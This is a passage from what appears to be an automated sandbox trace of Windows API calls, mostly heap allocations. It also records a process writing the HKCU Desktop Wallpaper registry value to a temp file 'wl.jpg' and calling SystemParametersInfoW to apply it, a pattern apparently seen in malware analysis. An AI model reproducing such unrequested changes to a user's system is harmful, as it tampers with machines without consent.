Flags=0x0, Size=0x10) returned 0x2e519d0 [0275.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0275.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0275.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0275.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0275.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0275.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0275.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0275.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0275.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0275.947] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0275.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0275.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0275.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0275.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0275.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0275.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0275.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0275.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0275.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0275.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0275.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0275.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0275.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0275.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0275.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0275.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0275.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0275.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0275.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0275.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0275.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0275.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0275.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0275.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0275.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0275.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0275.949] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0275.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0275.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0275.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0275.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0275.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0275.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0275.949] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0275.950] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0275.950] RegCloseKey (hKey=0x2d0) returned 0x0 [0275.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0275.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0275.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0275.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0275.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0275.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0275.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0275.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0275.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0275.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0275.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0275.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0275.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0275.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0275.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0275.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0275.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0275.951] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0275.951] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0275.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0275.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0275.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0275.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0275.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0275.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0275.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0275.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0275.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0275.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0275.952] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0275.952] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0275.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0275.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0275.953] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0275.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0275.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0275.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0275.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0275.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0275.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0275.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0275.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0275.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0275.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0275.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0275.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0275.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0275.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0275.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0275.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0275.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0275.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0275.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0275.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0275.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0275.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0275.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0275.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0275.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0275.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0275.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0275.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0275.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0275.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0275.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0275.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0275.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0275.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0275.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0275.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0275.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0275.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0275.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0275.956] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0275.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0275.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0275.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0275.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69ac8 [0275.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69ac8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0275.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0275.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0275.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0275.993] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0275.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0275.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0275.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0275.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0275.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0275.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0275.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0275.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0275.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0275.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0275.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0275.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0275.993] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0276.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0276.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0276.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0276.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 